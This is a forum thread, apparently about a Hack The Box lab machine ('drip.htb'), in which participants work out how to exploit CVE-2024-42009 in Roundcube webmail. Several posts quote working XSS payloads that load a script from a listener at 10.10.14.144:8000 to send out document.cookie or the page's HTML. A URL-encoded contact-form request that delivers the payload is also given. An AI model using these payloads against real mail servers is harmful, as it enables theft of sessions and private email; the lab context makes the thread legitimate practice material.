Posts: 14
Threads: 0
Joined: Jan 2025
So the Security Engineer is not clicking any links or attachments, I guess we have to POC one of the XSS:es ourselves and send it to him.
Posts: 124
Threads: 1
Joined: Apr 2024
(Feb 08, 2025, 08:06 PM)USBTYPEA Wrote: (Feb 08, 2025, 07:36 PM)peRd1 Wrote: (Feb 08, 2025, 07:15 PM)4yhg5y72jffg820j3f Wrote:
You can change the recipient of the email in the /contact POST request, which will give you information about one more user. Yes, intercept with burp and change the post request to your mailbox instead of support one and you will get the email with a footer.
I can't get it to work? interesting
(Feb 08, 2025, 08:06 PM)jsvensson Wrote: CVE-2024-42009 looks interesting but no poc
Description
A Cross-Site Scripting vulnerability in Roundcube through 1.5.7 and 1.6.x through 1.6.7
according to the description it won't work but you could try it.
why do you say it won't work? on this site they claim it works only they don't specify poc
Government Emails at Risk: Critical Cross-Site Scripting Vulnerability in Roundcube Webmail | Sonar
Posts: 24
Threads: 0
Joined: Dec 2023
(Feb 08, 2025, 08:06 PM)USBTYPEA Wrote: (Feb 08, 2025, 07:36 PM)peRd1 Wrote: (Feb 08, 2025, 07:15 PM)4yhg5y72jffg820j3f Wrote:
You can change the recipient of the email in the /contact POST request, which will give you information about one more user. Yes, intercept with burp and change the post request to your mailbox instead of support one and you will get the email with a footer.
I can't get it to work? interesting
(Feb 08, 2025, 08:06 PM)jsvensson Wrote: CVE-2024-42009 looks interesting but no poc
Description
A Cross-Site Scripting vulnerability in Roundcube through 1.5.7 and 1.6.x through 1.6.7
according to the description it won't work but you could try it.
http://drip.htb/index
In contact us section, choose your email, capture the request with burp then instead sending the message to support you change it to your mail
Posts: 15
Threads: 0
Joined: Feb 2025
(Feb 08, 2025, 08:13 PM)jsvensson Wrote: (Feb 08, 2025, 08:06 PM)USBTYPEA Wrote: (Feb 08, 2025, 07:36 PM)peRd1 Wrote: (Feb 08, 2025, 07:15 PM)4yhg5y72jffg820j3f Wrote:
You can change the recipient of the email in the /contact POST request, which will give you information about one more user. Yes, intercept with burp and change the post request to your mailbox instead of support one and you will get the email with a footer.
I can't get it to work? interesting
(Feb 08, 2025, 08:06 PM)jsvensson Wrote: CVE-2024-42009 looks interesting but no poc
Description
A Cross-Site Scripting vulnerability in Roundcube through 1.5.7 and 1.6.x through 1.6.7
according to the description it won't work but you could try it.
why do you say it won't work? on this site they claim it works only they don't specify poc
Government Emails at Risk: Critical Cross-Site Scripting Vulnerability in Roundcube Webmail | Sonar
okay okay. i was just basing it on the CVE description but you have to prove it. besides if there has already been someone who has demonstrated it but not given a POC it is just create it.
Posts: 16
Threads: 0
Joined: Jan 2025
(Feb 08, 2025, 08:13 PM)jsvensson Wrote: (Feb 08, 2025, 08:06 PM)USBTYPEA Wrote: (Feb 08, 2025, 07:36 PM)peRd1 Wrote: (Feb 08, 2025, 07:15 PM)4yhg5y72jffg820j3f Wrote:
You can change the recipient of the email in the /contact POST request, which will give you information about one more user. Yes, intercept with burp and change the post request to your mailbox instead of support one and you will get the email with a footer.
I can't get it to work? interesting
(Feb 08, 2025, 08:06 PM)jsvensson Wrote: CVE-2024-42009 looks interesting but no poc
Description
A Cross-Site Scripting vulnerability in Roundcube through 1.5.7 and 1.6.x through 1.6.7
according to the description it won't work but you could try it.
why do you say it won't work? on this site they claim it works only they don't specify poc
Government Emails at Risk: Critical Cross-Site Scripting Vulnerability in Roundcube Webmail | Sonar
These work:
<body title="bgcolor=foo" name="bar style=animation-name:progress-bar-stripes onanimationstart=document.body.appendChild(Object.assign(document.createElement('script'),{src:'http://10.10.14.144:8000/?c='+document.cookie})) foo=bar">
Foo
</body>
<body title="bgcolor=foo" name="bar style=animation-name:progress-bar-stripes onanimationstart=document.body.appendChild(Object.assign(document.createElement('script'),{src:'http://10.10.14.144:8000/?c='+btoa(document.documentElement.innerHTML)})) foo=bar">
Foo
</body>
You have to be sure to change the 'content' variable to 'html' as well as the recipient to bcase.
However, roundcube is set up to use http only cookies and scraping the page doesn't seem to have anything. It's not as simple as stealing the cookie.
Posts: 10
Threads: 4
Joined: Nov 2024
(Feb 08, 2025, 08:17 PM)jonklem Wrote: (Feb 08, 2025, 08:13 PM)jsvensson Wrote: (Feb 08, 2025, 08:06 PM)USBTYPEA Wrote: (Feb 08, 2025, 07:36 PM)peRd1 Wrote: (Feb 08, 2025, 07:15 PM)4yhg5y72jffg820j3f Wrote:
You can change the recipient of the email in the /contact POST request, which will give you information about one more user. Yes, intercept with burp and change the post request to your mailbox instead of support one and you will get the email with a footer.
I can't get it to work? interesting
(Feb 08, 2025, 08:06 PM)jsvensson Wrote: CVE-2024-42009 looks interesting but no poc
Description
A Cross-Site Scripting vulnerability in Roundcube through 1.5.7 and 1.6.x through 1.6.7
according to the description it won't work but you could try it.
why do you say it won't work? on this site they claim it works only they don't specify poc
Government Emails at Risk: Critical Cross-Site Scripting Vulnerability in Roundcube Webmail | Sonar
These work:
<body title="bgcolor=foo" name="bar style=animation-name:progress-bar-stripes onanimationstart=document.body.appendChild(Object.assign(document.createElement('script'),{src:'http://10.10.14.144:8000/?c='+document.cookie})) foo=bar">
Foo
</body>
<body title="bgcolor=foo" name="bar style=animation-name:progress-bar-stripes onanimationstart=document.body.appendChild(Object.assign(document.createElement('script'),{src:'http://10.10.14.144:8000/?c='+btoa(document.documentElement.innerHTML)})) foo=bar">
Foo
</body>
You have to be sure to change the 'content' variable to 'html' as well as the recipient to bcase.
However, roundcube is set up to use http only cookies and scraping the page doesn't seem to have anything. It's not as simple as stealing the cookie.
where is content var
Posts: 49
Threads: 0
Joined: Dec 2024
Maybe this one mentioned here:
https://www.bleepingcomputer.com/news/se...edentials/
CVE-2024-37383 This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching.
Posts: 15
Threads: 0
Joined: Feb 2025
(Feb 08, 2025, 08:17 PM)jonklem Wrote: (Feb 08, 2025, 08:13 PM)jsvensson Wrote: (Feb 08, 2025, 08:06 PM)USBTYPEA Wrote: (Feb 08, 2025, 07:36 PM)peRd1 Wrote: (Feb 08, 2025, 07:15 PM)4yhg5y72jffg820j3f Wrote:
You can change the recipient of the email in the /contact POST request, which will give you information about one more user. Yes, intercept with burp and change the post request to your mailbox instead of support one and you will get the email with a footer.
I can't get it to work? interesting
(Feb 08, 2025, 08:06 PM)jsvensson Wrote: CVE-2024-42009 looks interesting but no poc
Description
A Cross-Site Scripting vulnerability in Roundcube through 1.5.7 and 1.6.x through 1.6.7
according to the description it won't work but you could try it.
why do you say it won't work? on this site they claim it works only they don't specify poc
Government Emails at Risk: Critical Cross-Site Scripting Vulnerability in Roundcube Webmail | Sonar
These work:
<body title="bgcolor=foo" name="bar style=animation-name:progress-bar-stripes onanimationstart=document.body.appendChild(Object.assign(document.createElement('script'),{src:'http://10.10.14.144:8000/?c='+document.cookie})) foo=bar">
Foo
</body>
<body title="bgcolor=foo" name="bar style=animation-name:progress-bar-stripes onanimationstart=document.body.appendChild(Object.assign(document.createElement('script'),{src:'http://10.10.14.144:8000/?c='+btoa(document.documentElement.innerHTML)})) foo=bar">
Foo
</body>
You have to be sure to change the 'content' variable to 'html' as well as the recipient to bcase.
However, roundcube is set up to use http only cookies and scraping the page doesn't seem to have anything. It's not as simple as stealing the cookie. I think it's likely that an email address that we don't know will give us a credential for some XSS or email with some content.
Posts: 16
Threads: 0
Joined: Jan 2025
(Feb 08, 2025, 08:22 PM)0x2034 Wrote: (Feb 08, 2025, 08:17 PM)jonklem Wrote: (Feb 08, 2025, 08:13 PM)jsvensson Wrote: (Feb 08, 2025, 08:06 PM)USBTYPEA Wrote: (Feb 08, 2025, 07:36 PM)peRd1 Wrote: Yes, intercept with burp and change the post request to your mailbox instead of support one and you will get the email with a footer.
I can't get it to work? interesting
(Feb 08, 2025, 08:06 PM)jsvensson Wrote: CVE-2024-42009 looks interesting but no poc
Description
A Cross-Site Scripting vulnerability in Roundcube through 1.5.7 and 1.6.x through 1.6.7
according to the description it won't work but you could try it.
why do you say it won't work? on this site they claim it works only they don't specify poc
Government Emails at Risk: Critical Cross-Site Scripting Vulnerability in Roundcube Webmail | Sonar
These work:
<body title="bgcolor=foo" name="bar style=animation-name:progress-bar-stripes onanimationstart=document.body.appendChild(Object.assign(document.createElement('script'),{src:'http://10.10.14.144:8000/?c='+document.cookie})) foo=bar">
Foo
</body>
<body title="bgcolor=foo" name="bar style=animation-name:progress-bar-stripes onanimationstart=document.body.appendChild(Object.assign(document.createElement('script'),{src:'http://10.10.14.144:8000/?c='+btoa(document.documentElement.innerHTML)})) foo=bar">
Foo
</body>
You have to be sure to change the 'content' variable to 'html' as well as the recipient to bcase.
However, roundcube is set up to use http only cookies and scraping the page doesn't seem to have anything. It's not as simple as stealing the cookie.
where is content var
When you intercept with burp, change the request to look like this:
name=test&email=test%40test.com&message=%3Cbody+title%3D%22bgcolor%3Dfoo%22+name%3D%22bar+style%3Danimation-name%3Aprogress-bar-stripes+onanimationstart%3Ddocument.body.appendChild%28Object.assign%28document.createElement%28%27script%27%29%2C%7Bsrc%3A%27http%3A%2F%2F10.10.14.144%3A8000%2F%3Fc%3D%27%2Bbtoa%28document.documentElement.innerHTML%29%7D%29%29++foo%3Dbar%22%3E%0D%0A++Foo%0D%0A%3C%2Fbody%3E& content=html&recipient=bcase%40drip.htb
Posts: 15
Threads: 0
Joined: Feb 2025
(Feb 08, 2025, 08:27 PM)jonklem Wrote: (Feb 08, 2025, 08:22 PM)0x2034 Wrote: (Feb 08, 2025, 08:17 PM)jonklem Wrote: (Feb 08, 2025, 08:13 PM)jsvensson Wrote: (Feb 08, 2025, 08:06 PM)USBTYPEA Wrote: I can't get it to work? interesting
Description
A Cross-Site Scripting vulnerability in Roundcube through 1.5.7 and 1.6.x through 1.6.7
according to the description it won't work but you could try it.
why do you say it won't work? on this site they claim it works only they don't specify poc
Government Emails at Risk: Critical Cross-Site Scripting Vulnerability in Roundcube Webmail | Sonar
These work:
<body title="bgcolor=foo" name="bar style=animation-name:progress-bar-stripes onanimationstart=document.body.appendChild(Object.assign(document.createElement('script'),{src:'http://10.10.14.144:8000/?c='+document.cookie})) foo=bar">
Foo
</body>
<body title="bgcolor=foo" name="bar style=animation-name:progress-bar-stripes onanimationstart=document.body.appendChild(Object.assign(document.createElement('script'),{src:'http://10.10.14.144:8000/?c='+btoa(document.documentElement.innerHTML)})) foo=bar">
Foo
</body>
You have to be sure to change the 'content' variable to 'html' as well as the recipient to bcase.
However, roundcube is set up to use http only cookies and scraping the page doesn't seem to have anything. It's not as simple as stealing the cookie.
where is content var
When you intercept with burp, change the request to look like this:
name=test&email=test%40test.com&message=%3Cbody+title%3D%22bgcolor%3Dfoo%22+name%3D%22bar+style%3Danimation-name%3Aprogress-bar-stripes+onanimationstart%3Ddocument.body.appendChild%28Object.assign%28document.createElement%28%27script%27%29%2C%7Bsrc%3A%27http%3A%2F%2F10.10.14.144%3A8000%2F%3Fc%3D%27%2Bbtoa%28document.documentElement.innerHTML%29%7D%29%29++foo%3Dbar%22%3E%0D%0A++Foo%0D%0A%3C%2Fbody%3E&content=html&recipient=bcase%40drip.htb in http://drip.htb/index#contact
correct?
|
